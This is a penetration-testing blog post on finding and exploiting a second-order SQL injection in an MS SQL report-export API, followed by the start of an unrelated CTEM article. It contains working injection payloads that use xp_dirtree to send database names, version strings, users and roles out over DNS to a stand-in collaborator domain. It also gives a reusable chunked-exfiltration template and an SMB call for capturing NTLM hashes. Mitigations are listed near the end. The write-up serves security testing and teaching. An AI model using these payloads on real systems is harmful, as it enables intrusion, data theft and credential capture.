Exploiting Second Order SQL Injection with Stored Procedures https://www.netspi.com/blog/technical-blog/web-application-pentesting/second-order-sql-injection-with-stored-procedures-dns-based-egress/ Mon, 23 Dec 2024 03:30:00 +0000 https://www.netspi.com/?p=26186 Learn how to detect and exploit second-order SQL injection vulnerabilities using Out-of-Band (OOB) techniques, including leveraging DNS requests for data extraction.

Introduction 

In this blog, we explore the mechanics of detecting and exploiting a second-order SQL injection vulnerability, with a focus on Out-of-Band (OOB) techniques. This method, commonly used in scenarios where direct feedback isn’t possible, involves leveraging DNS requests to send data to an external domain controlled by the tester. We’ll guide you through the process of identifying the vulnerability, understanding how DNS-based exfiltration works, and demonstrating the escalation steps that can be chained together to gain deeper insights and control. We’ll also cover key challenges and ways to troubleshoot each step along the way. 

The Vulnerability 

The application is vulnerable to an out-of-band SQL injection in a Microsoft Excel report export feature. A second-order SQL injection occurs when malicious SQL payloads are stored by one part of an application and later executed in a different context, such as a subsequent API call, without proper sanitization. This makes the vulnerability harder to detect, as the payload does not trigger immediately.

In this case, the injection vulnerability is escalated using an SQL Server UNC Path Injection via xp_dirtree, a stored procedure that triggers file directory access on the SQL server. By carefully crafting the payload, we were able to send DNS queries from the backend to an external server under our control, ultimately disclosing information about the database, including usernames, tables, and the service account. 

Overview 

The application has an export functionality that accepts a date as input and generates an Excel report as output. Here’s what the chain of requests looks like: 

1. The client sends a request to /api/report with the affected parameter, and the server provides a report ID in the response. 

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"79464974-a4e9-4fc8-ace0-46a5a91ca143"

2. This identifier is later used in a follow-up request to /api/report/ExportToExcel to fetch the content for the Excel file, which is then downloaded as an attachment. 

HTTP Request:

GET /api/report/ExportToExcel?reportId=79464974-a4e9-4fc8-ace0-46a5a91ca143 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Te: trailers 
Connection: keep-alive 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
content-disposition: attachment; filename=Staff2024-10-07.xlsx 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Mon, 07 Oct 2024 08:39:20 GMT 
Content-Length: 6342 

PKêGY 
[TRUNCATED] 

Detection 

Injecting random data into the date parameter had no visible effect on the first request, which generates the report ID. However, the follow-up request to /api/report/ExportToExcel, which fetches the Excel file using the report ID from the /api/report response, produces different results depending on whether the injected SQL query is balanced or imbalanced. 

1. First, we will send an HTTP request to the report generation endpoint with a single quote injected into the Value JSON parameter to break the SQL syntax. 

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 
Connection: keep-alive 

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z'\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
}

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"79464974-a4e9-4fc8-ace0-46a5a91ca143"

2. The follow-up request now returns a 500 Internal Server Error because the report ID/Excel file does not exist in the backend. This likely occurred because the report was never generated in the previous step: the injected single quote left an imbalanced SQL query in the date range filter.

HTTP Request:

GET /api/report/ExportToExcel?reportId=79464974-a4e9-4fc8-ace0-46a5a91ca143 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */*

HTTP Response:

HTTP/1.1 500 Internal Server Error 
Cache-Control: private 
Pragma: no-cache 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 0 

3. Furthermore, to confirm, as soon as we balanced the SQL query by commenting out its remainder (e.g., 2024-10-06T00:00:00.000Z';--), the server started returning a successful 200 OK response for the follow-up request along with an Excel sheet. This led us to deduce that an SQL injection vulnerability exists.

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0)  
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 164 

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-10-06T00:00:00.000Z';--\",\"DisplayValue\":\"2024-10-05T18:30:00.000Z\"}}"} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Content-Length: 38 

"f5ca5f5b-f1f4-4d32-afc6-015b91a44ee4" 

HTTP Request:

GET /api/report/ExportToExcel?reportId=f5ca5f5b-f1f4-4d32-afc6-015b91a44ee4 HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 
Accept: application/json, text/plain, */* 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED]; path=/; secure; HttpOnly; SameSite=None 
content-disposition: attachment; filename=Staff2024-10-07.xlsx 
X-Server: 96722 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Wed, 16 Oct 2024 20:08:44 GMT 
Content-Length: 6342 

PKêGY 
[TRUNCATED] 

The next step for us was to identify the backend database. Since this was a blind SQL injection, we proceeded to test generic sleep delays. The idea is that the follow-up request will keep returning errors while the sleep delay holds up report generation, and will start returning successful responses once the SQL query completes its execution and the report associated with our identifier is generated. 

While time-delay payloads for other databases yielded the same responses as before, the Microsoft SQL payload stood out. Below is an example of one of the injected payloads used while testing sleep delays:  

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-10-06T00:00:00.000Z';WAITFOR DELAY '0:0:20';--\",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

Even though the injected query is balanced, after issuing the above request, the server initially responds to the follow-up request with a 500 Internal Server Error. Interestingly, after 20 seconds, reissuing the follow-up request yields a successful 200 OK response.  

Since WAITFOR delays are specific to Microsoft SQL Server, this confirms the backend database is Microsoft SQL Server.
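
For reference, the equivalent time-delay probes differ between database engines, which is what makes this technique useful for fingerprinting. The snippets below are only a rough sketch of typical per-engine delay probes (injected after the closing quote, like the WAITFOR example above); whether stacked statements like these execute at all depends on the backend and driver, and only the SQL Server variant produced the delayed-then-successful behaviour here: 

-- Microsoft SQL Server: pause the batch for 20 seconds 
'; WAITFOR DELAY '0:0:20';-- 

-- MySQL: sleep for 20 seconds (stacked queries are rarely allowed by the driver) 
'; SELECT SLEEP(20);-- 

-- PostgreSQL: sleep for 20 seconds 
'; SELECT pg_sleep(20);-- 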

Exploitation 

MS-SQL offers powerful stored procedures, functions, and out-of-band connections. This approach seemed promising, as it could enable a single-step attack, in contrast to the more complex two-step, time-based blind injection method mentioned earlier, which would require some automation. 

While many methods were unsuccessful, the use of out-of-band connections with xp_dirtree revealed something different. 

Here’s how the vulnerable Value parameter (which contains the date) inside the JSON ReportParams looked when it was initially sent by the application: 

"ReportParams":"{ 
               \"76\": { 
                 \"Value\":\"2024-08-22T00:00:00.000Z\", 
                 \"DisplayValue\": \"2024-08-14T18:30:00.000Z\"  
                 } 
            }"  

By injecting a SQL query that calls the xp_dirtree stored procedure into the Value field, we were able to force the SQL server to make a series of DNS requests to a domain under our control. 

"ReportParams":"{ 
               \"76\": { 
               . \"Value\": \"2024-08-22T00:00:00.000Z'; DECLARE @q VARCHAR(99);SET @q='\\\\\\\\collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @q;-- \", 
                 \"DisplayValue\": \"2024-08-14T18:30:00.000Z\"  
                 } 
            }" 

Here’s a simple breakdown of the SQL injection performed (a cleaned-up version of the full statement follows the list): 

  1. 2024-08-22T00:00:00.000Z'; : Closes an existing SQL string literal and query with '; and opens the door for injection. 
  2. declare @q varchar(99); : Declares a variable @q that can store up to 99 characters. 
  3. set @q='\\\\\\\\collab.domain\\\\path'; : Sets the value of @q to the UNC path \\collab.domain\path (escaped for backslashes in SQL). 
  4. exec master.dbo.xp_dirtree @q; : Executes the xp_dirtree procedure, which lists directories and subdirectories at the specified network path ( \\collab.domain\path ). 
  5. -- : The double hyphen ( -- ) is used in SQL to comment out the rest of the line. This ensures that any additional characters or commands following the injected code are ignored. 
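
Putting those pieces together, the statement that ultimately runs on the SQL Server (with the JSON escaping stripped away) looks roughly like this; collab.domain is the tester-controlled collaborator domain from the payload: 

-- The injected date value terminates the original string literal, then: 
DECLARE @q VARCHAR(99);             -- variable that will hold the UNC path 
SET @q = '\\collab.domain\path';    -- UNC path pointing at the tester-controlled host 
EXEC master.dbo.xp_dirtree @q;      -- the directory listing attempt forces a DNS lookup for collab.domain 
-- the trailing -- comments out the remainder of the original query 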

Upon executing the payload, we received DNS requests from the server, confirming the vulnerability. 

Exfiltration via Subdomain in the UNC Path 

Next, I used DB_NAME() to confirm the database name and the system function @@SERVERNAME to grab the server name, sending both through DNS requests where the data would be exfiltrated in the subdomain. 

Extracting the Database Name 

The following payload extracts the database name and sends it as part of a DNS request: 

{ 
  "76": { 
    "Value": "2024-08-22T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = DB_NAME(); DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\' + @q + '.collab.domain\\path'; EXEC master.dbo.xp_dirtree @cmd;-- ", 
    "DisplayValue": "2024-08-14T18:30:00.000Z" 
  } 
} 

This more or less corresponds to the following MS SQL query (backslashes are still shown JSON-escaped): 

DECLARE @q NVARCHAR(256);  
SELECT @q = DB_NAME();  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\' + @q + '.collab.domain\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 

  1. DECLARE @q NVARCHAR(256); : Declares a variable @q that can hold up to 256 characters.
  2. SELECT @q = DB_NAME(); : Retrieves the current database name and stores it in @q.
  3. DECLARE @cmd NVARCHAR(4000); : Declares a variable @cmd to store the full UNC path.
  4. SET @cmd = '\\' + @q + '.collab.domain\path'; : Constructs a UNC path where the database name is part of the subdomain.
  5. EXEC master.dbo.xp_dirtree @cmd; : Executes xp_dirtree to list directories from the constructed UNC path.

Here’s the HTTP request/response for the payload:

HTTP Request:

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 362 
Connection: keep-alive 

{ 
  "ReportTypeId": 36, 
  "ReportActionType": "Export", 
  "ReportParams": "{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = DB_NAME(); DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + @q + '.adr23315c31r8pinagov0y3pkgq7eyhm6.collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}" 
} 

HTTP Response:

HTTP/1.1 200 OK 
Cache-Control: private 
Pragma: no-cache 
Content-Type: application/json; charset=utf-8 
Expires: -1 
Set-Cookie: SESSION_TOKEN=[REDACTED] 
Strict-Transport-Security: max-age=300; includeSubDomains 
Date: Mon, 19 Aug 2024 13:25:08 GMT 
Content-Length: 38 

"c5cefa93-3e49-48db-927d-9838e0345ba1" 

Collaborator hit: 

staging.adr23315c31r8pinagov0y3pkgq7eyhm6.collab.domain 

Database name: staging 

Extracting the Server Name 

Similarly, for the server name, one can use the following payload:

DECLARE @v NVARCHAR(256);  
SELECT @v = @@SERVERNAME;  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @v + '.zrurhsfuqsfgmewco52kenhey54wsnwbl.collab.domain\\\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 

Collaborator hit:

demodb.zrurhsfuqsfgmewco52kenhey54wsnwbl.collab.domain 

Server name: demodb  

Although the responses were the same for any input provided to the vulnerable Value parameter in the /api/report endpoint, successful exploitation was confirmed through out-of-band connections using SQL Server UNC Path injection, allowing me to retrieve the database and server names. However, I ran into issues when trying to exfiltrate additional data. 

We failed to receive connections from the backend database on our remote server in the following scenarios: 

  • Attempting to exfiltrate data containing spaces or other special characters.
  • Sending data longer than 63 characters in length. 

Subdomain and String Issues 

Upon running into the above issues and going through the contents of RFC 1035, I concluded that the DNS exfiltration was failing because one or both of the following restrictions were being violated: 

  1. Subdomain Character Limitations
    Only alphanumeric characters and - are allowed in subdomains, similar to ARPANET host name rules.
    To ensure the data extracted via the subdomain names does not contain any bad characters, a REPLACE() function can be added to strip them out. 
  2. Subdomain Length Restrictions
    While the maximum length of a full domain name is restricted to 255 octets, an individual DNS label (subdomain) is limited to a maximum of 63 characters, which explains the failures we saw with longer values.
    To deal with long strings such as version banners, we will use SUBSTRING() to extract the data piece by piece (a generic sketch of this pattern follows the list). 
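
These two workarounds combine into the reusable pattern sketched below, which the remaining payloads follow: take a fixed-size chunk of the target value, strip characters that are not valid in a DNS label, and place the result as the left-most label of the lookup. This is only a sketch; the @offset value and the <collaborator-subdomain> placeholder need to be adjusted per request: 

-- Sketch: exfiltrate one 50-character chunk of an arbitrary expression over DNS 
DECLARE @offset INT = 1;                            -- bump by 50 for each subsequent chunk 
DECLARE @chunk NVARCHAR(256); 
SELECT @chunk = SUBSTRING(@@VERSION, @offset, 50);  -- swap @@VERSION for any expression to exfiltrate 

-- Replace characters that are not DNS-safe with a hyphen 
SELECT @chunk = REPLACE(@chunk, c.value, '-') 
FROM (VALUES (' '),('/'),(':'),(CHAR(13)),(CHAR(10)),(CHAR(9)),('('),(')'),('<'),('>')) AS c(value); 

DECLARE @cmd NVARCHAR(4000); 
SET @cmd = '\\' + @chunk + '.<collaborator-subdomain>.collab.domain\path'; 
EXEC master.dbo.xp_dirtree @cmd; 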

Extracting SQL Server Version 

The following HTTP request was issued to extract the first 50 characters of the SQL Server version. Only 50 characters are requested at a time because the exfiltrated data becomes the left-most DNS label, which is limited to 63 characters: 

e.g., [EXFIL DATA].[SUBDOMAIN].collab.domain 

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 
Accept: application/json, text/plain, */* 
Content-Type: application/json;charset=utf-8 
Content-Length: 532

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z';DECLARE @q NVARCHAR(256); SELECT @q = SUBSTRING(@@VERSION, 1, 50); SELECT @q = REPLACE(@q, c.value, 'X') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\\\path'; EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}"} 

The corresponding SQL query (backslashes still shown JSON-escaped): 

DECLARE @q NVARCHAR(256);  
SELECT @q = SUBSTRING(@@VERSION, 0, 50);  
SELECT @q = REPLACE(@q, c.value, '-') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);   

DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\\\path';  

EXEC master.dbo.xp_dirtree @cmd;-- 

Here’s a breakdown of the query: 

  1. DECLARE @q NVARCHAR(256); : Declares a variable @q to store part of the SQL Server version.
  2. SELECT @q = SUBSTRING(@@VERSION, 0, 50); : Extracts the first 50 characters of the SQL Server version using @@VERSION and stores it in @q.
  3. SELECT @q = REPLACE(@q, c.value, '-') FROM (VALUES (' '),('/'),('-'),(':'),(CHAR(13)),(CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value); : Replaces special characters (spaces, slashes, hyphens, etc.) including characters like carriage return, line feed and tabs in the extracted version string with the character - , sanitizing the value in @q.
  4. DECLARE @cmd NVARCHAR(4000); : Declares a variable @cmd to store the full UNC path.
  5. SET @cmd = '\\\\' + @q + '.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain\\path'; : Constructs the UNC path, embedding the sanitized version string as a subdomain in the domain i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain and appending \\path.
  6. EXEC master.dbo.xp_dirtree @cmd; : Executes xp_dirtree to list directories from the constructed UNC path, exfiltrating the SQL Server version string via the subdomain in a DNS request.

To fetch the next 50 characters of the SQL Server version, you can modify the SUBSTRING function’s offset: SUBSTRING(@@VERSION, 50, 50);.

Collaborator hits:

Microsoft-SQL-Server-2019--RTM-CU27-GDR---KB50409.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

48----15.0.4382.1--X64----Jul--1-2024-20-03-23---C.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

opyright--C--2019-Microsoft-Corporation--Enterpris.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

e-edition--core-based-licensing--64-bit--on-window.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

s-Server-2019-Standard-10.0--X64---Build-17763----.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

-Hypervisor--.i0jaqbodzbozvx5vxob3n6qx7odf19zxo.collab.domain 

MS-SQL Version:

$ awk -F'.' '{print $1}' version | sed 's/-/ /g; s/  */ /g' | tr -d '\n' 

Microsoft SQL Server 2019 RTM CU27 GDR KB5040948 15.0.4382.1 X64 Jul 1 2024 20 03 23 Copyright C 2019 Microsoft Corporation Enterprise Edition Core based Licensing 64 bit on Windows Server 2019 Standard 10.0 X64 Build 17763 Hypervisor 

Extracting the list of DBs present 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM master..sysdatabases ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY) + '.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain\\\\path'; 

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  

EXEC master.dbo.xp_dirtree @cmd;-- 

By adjusting the value in OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY (OFFSET 1, OFFSET 2, and so on), we were able to retrieve the remaining databases from the sysdatabases table. 

Collaborator hit:

staging.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain 
master.9bl112z4a2zq6ogm8fmuyx1oifo6c29qy.collab.domain
… 

Database names:

$ cat output | awk -F'.' '{print $1}' 
staging 
master 
… 

While querying master..sysdatabases was a useful approach, using DB_NAME(1), DB_NAME(2), and so on provided an equally effective, if not better, means to achieve similar results. 
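
As a rough sketch, a DB_NAME()-based variant could look like the following, incrementing the database ID on each request (the collaborator subdomain is again a placeholder). Under default settings, if a given ID does not exist, DB_NAME() returns NULL, the concatenation becomes NULL, and no DNS hit arrives: 

DECLARE @cmd NVARCHAR(4000); 
-- DB_NAME(1) is master, DB_NAME(2) is tempdb, and so on; increment the ID per request 
SET @cmd = '\\' + DB_NAME(1) + '.<collaborator-subdomain>.collab.domain\path'; 
SELECT @cmd = REPLACE(@cmd, c.value, '-') 
FROM (VALUES (' '),('/'),(':'),(CHAR(13)),(CHAR(10)),(CHAR(9)),('('),(')'),('<'),('>')) AS c(value); 
EXEC master.dbo.xp_dirtree @cmd; 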

Dumping all the users and roles 

The sys.database_principals view proved to be a good source of information about database users, roles, and schemas. 

SQL query: 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.database_principals ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY) + '.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain\\\\path';  

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  

EXEC master.dbo.xp_dirtree @cmd;-- 

Collaborator hits: 

guest.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
dbo.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
INFORMATION_SCHEMA.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
public.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
sys.b2e3s4q614qsxq7ozhdwpzsq9hf8344st.collab.domain 
… 

User/role names: 

$ awk -F'.' '{print $1}' 
guest 
dbo 
INFORMATION_SCHEMA 
public 
sys 
… 

The list does not indicate which of these users is the current user. The next section demonstrates how we identified the current user. 

Getting the current user and permissions 

While other methods of fetching the current user may not work, a simple approach is to query the sys.sysusers table and compare its uid values with the value returned by USER_ID(). 

SQL Payload: 

DECLARE @cmd NVARCHAR(4000);  

SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.sysusers WHERE uid = USER_ID()) + '.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain\\\\path';  

SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value);  
EXEC master.dbo.xp_dirtree @cmd;-- 

HTTP Request: 

POST /api/report HTTP/1.1 
Host: sqli-lab.local 
Cookie: SESSION_TOKEN=[REDACTED] 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0)  
Content-Type: application/json;charset=utf-8 
Content-Length: 513 

{"ReportTypeId":36,"ReportActionType":"Export","ReportParams":"{\"76\":{\"Value\":\"2024-08-15T00:00:00.000Z'; DECLARE @cmd NVARCHAR(4000); SET @cmd = '\\\\\\\\' + (SELECT name FROM sys.sysusers WHERE uid = USER_ID()) + '.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain\\\\path'; SELECT @cmd = REPLACE(@cmd, c.value, '-') FROM (VALUES (' '),('/'),(':'),(CHAR(13)), (CHAR(10)), (CHAR(9)),('('), (')'), ('<'), ('>')) AS c(value); EXEC master.dbo.xp_dirtree @cmd;--  \",\"DisplayValue\":\"2024-08-14T18:30:00.000Z\"}}"} 

Unfortunately, the username returned as public, which has minimal permissions. To check if the user is a sysadmin, we can use the following payload: 

DECLARE @q NVARCHAR(256);  
SELECT @q = is_srvrolemember('sysadmin');  
DECLARE @cmd NVARCHAR(4000);  
SET @cmd = '\\\\\\\\' + @q + '.s4xkulsn3ls9z7951yfdrgu7byhp5g34s.collab.domain\\\\path';  
EXEC master.dbo.xp_dirtree @cmd;-- 

Collaborator hit:

0.r2ujskqm1kq8x674zxdcpfs69xfo3k78w.collab.domain 

The result indicates that the user is not a sysadmin, returning false (0).

Stealing Net-NTLM hashes with xp_dirtree

We can also attempt to capture NTLMv2 hashes that may be used for authentication by setting up an SMB server (such as impacket-smbserver or Responder). 

To reach out to our SMB server, we can execute the following xp_dirtree query: 

EXEC master.dbo.xp_dirtree '\\\\\\\\collab.domain\\\\path'; 

For more details on related techniques and considerations, refer to our previous blogs on executing SMB relay attacks via SQL Server and SQL Server link crawling with PowerUpSQL. 

Mitigations 

To enhance security against SQL injection attacks, here are some mitigations we recommend: 

  1. Parameterized Queries: Always use parameterized queries to handle user input securely (see the sketch after this list). 
  2. Data Type Enforcement and Input Filtering: Strictly define acceptable data types (e.g., strings, alphanumeric characters) for all inputs. Also, implement data input filters to remove potentially harmful characters, using allowlists and regular expressions. 
  3. Database Hardening: Secure the database server to prevent unauthorized data access. 
  4. Generic Error Messages: Disable detailed error messages that expose sensitive information. Use generic error messages instead, directing users to contact IT or the web administrator. 
  5. Principle of Least Privilege: Apply the principle of least privilege when assigning permissions to limit the impact of SQL injection attacks. Use a non-privileged service account to run the database server, ensuring the database user lacks administrative privileges. 
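
To illustrate the first item, here is a minimal sketch of what a parameterized version of the report's date filter could look like on the SQL Server side using sp_executesql. The procedure, table, and column names are hypothetical, since the application's real query isn't visible to us: 

-- Hypothetical example: the report date is a strongly typed parameter passed to 
-- sp_executesql, so user input can never terminate the string literal or append statements. 
CREATE PROCEDURE dbo.GetStaffReport 
    @FromDate DATETIME2        -- non-date input is rejected before any SQL runs 
AS 
BEGIN 
    EXEC sp_executesql 
        N'SELECT * FROM dbo.StaffReport WHERE CreatedAt >= @FromDate',  -- placeholder table/column 
        N'@FromDate DATETIME2', 
        @FromDate = @FromDate; 
END 

The same principle applies in the application layer: the date should be bound as a parameter by the data-access library rather than concatenated into the query string. 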

Summary 

In this engaging penetration test, we successfully uncovered a second-order MS SQL injection vulnerability using an Out-of-Band (OOB) technique. This approach allowed us to exfiltrate sensitive data by leveraging stored procedures, specifically xp_dirtree, which is particularly useful for making network requests and accessing file systems within SQL Server environments. 

Due to time constraints, we could not explore additional exploitation paths, such as multi-step time-based blind SQL injection. Instead, we utilized an Interactsh server to automate the capture of Out-of-Band calls directed to our collaborator server. This method streamlined the process of data exfiltration, demonstrating the effectiveness of OOB techniques in SQL injection scenarios. 

Navigating the intricacies of SQL injection posed several challenges, particularly in managing character limits and other special conditions. Each hurdle we encountered underscored the complexity and excitement of web application security testing. The experience highlighted the delicate balance between vulnerability discovery and exploitation in real-world applications, reinforcing the critical need for robust security measures in database management systems. 

This test not only showcased our technical capabilities but also illuminated the broader implications of SQL injection vulnerabilities and their potential impact on organizational security. 

Thank you for reading! 

We hope these insights and recommendations help enhance your application’s security against SQL injection attacks. 

CTEM Defined: The Fundamentals of Continuous Threat Exposure Management https://www.netspi.com/blog/executive-blog/proactive-security/ctem-defined-the-fundamentals-of-continuous-threat-exposure-management/ Thu, 19 Dec 2024 13:45:00 +0000 https://www.netspi.com/?p=26179 Learn how continuous threat exposure management (CTEM) boosts cybersecurity with proactive strategies to assess, manage, and reduce risks.

Cybersecurity challenges evolve daily, and organizations recognize the need to enhance their strategies to stay ahead of potential threats. Traditional vulnerability management frameworks are no longer enough to address the complex and expanding attack surface that enterprises face today. This is where continuous threat exposure management (CTEM) emerges as a powerful process for cybersecurity programs.

CTEM Definition: What is Continuous Threat Exposure Management?

CTEM is more than just a buzzword — it’s a vital shift in how organizations view and manage their security posture. A recent article in BizTech Magazine highlights experts’ insights on CTEM. In the article, Erik Nost of Forrester describes CTEM as “a new approach that unifies various proactive security solutions, offering a comprehensive view of vulnerabilities, visibility, and response orchestration.” By enabling continuous assessment of digital and physical assets for exposure, accessibility, and exploitability, CTEM provides a proactive approach to identifying and addressing modern threats. Now more than ever, proactive security strategies are critical in mitigating risks before they become full-blown security incidents, and in ensuring organizations stay cyber resilient.

According to Gartner, “What’s needed is a continuous threat exposure management (CTEM) program that surfaces and actively prioritizes whatever most threatens your business. Creating any such program requires a five-step process.” It allows organizations to continuously assess the accessibility, visibility, and exploitability of their digital environments. Unlike traditional risk-based vulnerability management (RBVM), CTEM expands beyond identifying vulnerabilities. It includes governance, process optimization, and long-term improvements to ensure vulnerabilities are remediated.

